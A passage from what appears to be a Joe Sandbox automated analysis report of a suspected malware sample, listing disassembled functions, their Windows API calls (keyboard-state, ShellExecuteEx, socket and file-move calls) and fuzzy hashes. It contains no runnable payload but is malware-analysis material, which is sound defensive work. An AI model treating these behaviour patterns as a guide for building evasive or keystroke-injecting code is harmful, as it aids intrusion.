                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: e1308c9ed746c736ca4944b39c64e86a617d1b17ea5074c0cefd3d3ce9bc0b84
                                                  • Instruction ID: 28b61feb67e07e4551c8036786670d99f5e501cc8026f87077f32e9f1cde473a
                                                  • Opcode Fuzzy Hash: e1308c9ed746c736ca4944b39c64e86a617d1b17ea5074c0cefd3d3ce9bc0b84
                                                  • Instruction Fuzzy Hash: 79014FF6900208BFE75197A0DD89FEA776CEB08701F4005B9BB49E2061EA749EC64B74
                                                  Function 00C7D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C7D47C
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C7D49C
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C7D6D7
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C7D6F5
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C7D716
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00C7D735
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C7D75A
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C7D77D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: 901ae930fccd1c8e2e78fa2b5e8d6cb188917ce29801c6c6afda4fe95ca41c8f
                                                  • Instruction ID: e2e29aa5c7f7f0362a8caedffd406278e565aec25597f943ebcd82ed31944545
                                                  • Opcode Fuzzy Hash: 901ae930fccd1c8e2e78fa2b5e8d6cb188917ce29801c6c6afda4fe95ca41c8f
                                                  • Instruction Fuzzy Hash: 02B18A75600219ABDF18CF69C9C5BAD7BB1BF04701F08C169FC5E9B299D734AA90CB60
                                                  Function 00BF2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00BF2ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00BF2B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00C2C21A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C1C7,00000004,00000000,00000000,00000000), ref: 00C2C286
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: a6ff9708ceb4cb2917b8223c6255fcbd4d87db9781571f553d36b08fdc1cf3a1
                                                  • Instruction ID: 5a323ef3cb975566981aaaf98d4f0b18b439abc773ebe5bc99d35caa533f1bad
                                                  • Opcode Fuzzy Hash: a6ff9708ceb4cb2917b8223c6255fcbd4d87db9781571f553d36b08fdc1cf3a1
                                                  • Instruction Fuzzy Hash: 0C411A30608E88DAC7398B39DCDCB7F7BD2EB85310F14889DE25787961CA75988AD711
                                                  Function 00C570C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C570DD
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C57114
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C57130
                                                  • _memmove.LIBCMT ref: 00C5717E
                                                  • _memmove.LIBCMT ref: 00C5719B
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C571AA
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C571BF
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C571DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 93d2eae1861c1a174207586fc62317df967d3df81c3a822905bd5405563e047f
                                                  • Instruction ID: ea45747f4eacc5f6fea73c8e03027638bad74e022e5b84741798aa9fea7dbe5f
                                                  • Opcode Fuzzy Hash: 93d2eae1861c1a174207586fc62317df967d3df81c3a822905bd5405563e047f
                                                  • Instruction Fuzzy Hash: 3A319235900205EBCF00DFA5DC85AAF7778EF45310F2441A9FD089B246DB709E95DB60
                                                  Function 00C761D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C761EB
                                                  • GetDC.USER32(00000000), ref: 00C761F3
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C761FE
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C7620A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C76246
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C76257
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C7902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C76291
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C762B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: cb0570e6b0b3d11cb4f0f83fc030dd4f31ccdc2d6fd72557792cb7ea8f82c597
                                                  • Instruction ID: 33e31df23076cc5787eef999479e6fb83f5754815d12c9660c6dc5db820c8882
                                                  • Opcode Fuzzy Hash: cb0570e6b0b3d11cb4f0f83fc030dd4f31ccdc2d6fd72557792cb7ea8f82c597
                                                  • Instruction Fuzzy Hash: E5316D72101614BFEB118F54CC8AFEA3BA9EF49765F044065FE0C9A292D6759C82CB60
                                                  Function 00C4BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 7e5bc72ea2c1611f5c093a9473427cd76f270960a334d678ca3a8c47c83f5ef2
                                                  • Instruction ID: 4891573043a88de74e865c9c40aa3d82810ef2daeb009fbdbbd1749e2ef7b2c5
                                                  • Opcode Fuzzy Hash: 7e5bc72ea2c1611f5c093a9473427cd76f270960a334d678ca3a8c47c83f5ef2
                                                  • Instruction Fuzzy Hash: D421C0716012067BE60476229DC2FFB775DFE1178CF084029FE0596647EB68DF21E2A5
                                                  Function 00C5EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • _wcstok.LIBCMT ref: 00C5EC94
                                                  • _wcscpy.LIBCMT ref: 00C5ED23
                                                  • _memset.LIBCMT ref: 00C5ED56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: ff94cb7f557be55b838289519a15b43c714e182c3eee52c2df8c75dca1180875
                                                  • Instruction ID: bdaf7345e878e2ad60b22487cbb4ca6979b94e45c8b4494b277bb8e72d3c0a7a
                                                  • Opcode Fuzzy Hash: ff94cb7f557be55b838289519a15b43c714e182c3eee52c2df8c75dca1180875
                                                  • Instruction Fuzzy Hash: E5C191755083049FC728EF64C885E6AB7E0FF85310F00496DF9999B2A2DB70ED89CB46
                                                  Function 00C66B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C66C00
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C66C21
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66C34
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00C66CEA
                                                  • inet_ntoa.WSOCK32(?), ref: 00C66CA7
                                                    • Part of subcall function 00C4A7E9: _strlen.LIBCMT ref: 00C4A7F3
                                                    • Part of subcall function 00C4A7E9: _memmove.LIBCMT ref: 00C4A815
                                                  • _strlen.LIBCMT ref: 00C66D44
                                                  • _memmove.LIBCMT ref: 00C66DAD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: 5f4c656ecb9b071e7bcb8da9019de669d29775f30c22b03784bc385560d3721d
                                                  • Instruction ID: d7fd951c495d34465f478106b83e56aeaaad11f0f1b8fed7ca04bb5ac66e30a2
                                                  • Opcode Fuzzy Hash: 5f4c656ecb9b071e7bcb8da9019de669d29775f30c22b03784bc385560d3721d
                                                  • Instruction Fuzzy Hash: A981B171204204ABC720EF24CCC6F7AB7E8AF84714F144A6CF6559B2D2DA70ED45CB92
                                                  Function 00BF1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b0164e5257cc9b74b22d96abb15d880a70c00d3a8c137b7c81947c1c6ba49d1
                                                  • Instruction ID: e05897d2ebda8fdc0fd1162890bcac55b4a6cd69e45d1875cd78039a3eab2b30
                                                  • Opcode Fuzzy Hash: 3b0164e5257cc9b74b22d96abb15d880a70c00d3a8c137b7c81947c1c6ba49d1
                                                  • Instruction Fuzzy Hash: 71717E70900109EFDB04CF99CC85ABEBBB9FF85310F148999FA15AB251C730AA55CFA4
                                                  Function 00C7B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(015652E0), ref: 00C7B3EB
                                                  • IsWindowEnabled.USER32(015652E0), ref: 00C7B3F7
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C7B4DB
                                                  • SendMessageW.USER32(015652E0,000000B0,?,?), ref: 00C7B512
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00C7B54F
                                                  • GetWindowLongW.USER32(015652E0,000000EC), ref: 00C7B571
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C7B589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 262d7876e40db76a9f0b2663a73b8747456af78dc294421a5e51de4c3f169671
                                                  • Instruction ID: 7d333a61654c7b70cfeb9c332d7abfaa8fe6cc92c388477131041cbbc1e7fbfe
                                                  • Opcode Fuzzy Hash: 262d7876e40db76a9f0b2663a73b8747456af78dc294421a5e51de4c3f169671
                                                  • Instruction Fuzzy Hash: B5718034604604EFDB219F65C8D4FBA7BB9FF09300F148159F969972A2CB31AE81DB50
                                                  Function 00C6F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6F448
                                                  • _memset.LIBCMT ref: 00C6F511
                                                  • ShellExecuteExW.SHELL32(?), ref: 00C6F556
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00C6F5CD
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C6F5FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: dce0b6d5582d557ecab485148f8f23f0009cf88b1105d7dcf37421db04cb70e1
                                                  • Instruction ID: 4096135ac33a66a234c49d3142b0bd4029201e78eb868e306d695fe35a60547e
                                                  • Opcode Fuzzy Hash: dce0b6d5582d557ecab485148f8f23f0009cf88b1105d7dcf37421db04cb70e1
                                                  • Instruction Fuzzy Hash: F461BF75A006199FCB14DF64D481AAEBBF5FF49350F1480ADE85AAB351CB30AE46CF90
                                                  Function 00C50F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00C50F8C
                                                  • GetKeyboardState.USER32(?), ref: 00C50FA1
                                                  • SetKeyboardState.USER32(?), ref: 00C51002
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C51030
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5104F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C51095
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C510B8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 0ecd46e51f7d3514b3fb3702fbd900128bdc45fa0525bea5c5f8a83301f81281
                                                  • Instruction ID: 4798a869957217cd5bf477811b9fb068c69987e33520bd566e868ce0f0d68621
                                                  • Opcode Fuzzy Hash: 0ecd46e51f7d3514b3fb3702fbd900128bdc45fa0525bea5c5f8a83301f81281
                                                  • Instruction Fuzzy Hash: 085134645047D53DFB3642748C49BBABEA96B06306F0C8589EDE4868C3C2D8DECCD754
                                                  Function 00C50D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00C50DA5
                                                  • GetKeyboardState.USER32(?), ref: 00C50DBA
                                                  • SetKeyboardState.USER32(?), ref: 00C50E1B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C50E47
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C50E64
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C50EA8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C50EC9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 29ed0b6785b16020de0b6a17753ff2f6df531f6a2f4887ac07af6bc3ca7703c8
                                                  • Instruction ID: 91023e990ac8bf1ffe71d697ac63ba234e8a607170fef0db8edb85a21c252185
                                                  • Opcode Fuzzy Hash: 29ed0b6785b16020de0b6a17753ff2f6df531f6a2f4887ac07af6bc3ca7703c8
                                                  • Instruction Fuzzy Hash: 2B51F6A45046D57DFB3243648C46B7A7FA96B06301F28498DE9E4C64C2C3D5ADCCE758
                                                  Function 00C555FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 7581a56bc054100443c9dae325a1cc1986050e9f185e1ed5de0a5bef76bc6cef
                                                  • Instruction ID: b6b88771e12fad9f9c5244b210dace7253d286e6fd829978b9743c02602bff9b
                                                  • Opcode Fuzzy Hash: 7581a56bc054100443c9dae325a1cc1986050e9f185e1ed5de0a5bef76bc6cef
                                                  • Instruction Fuzzy Hash: E741C779C2061476CB11EBB58C469CFB3B89F05310F504456F919E3221EB34A3D5E7AA
                                                  Function 00C53671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53697,?), ref: 00C5468B
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53697,?), ref: 00C546A4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C536B7
                                                  • _wcscmp.LIBCMT ref: 00C536D3
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C536EB
                                                  • _wcscat.LIBCMT ref: 00C53733
                                                  • SHFileOperationW.SHELL32(?), ref: 00C5379F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
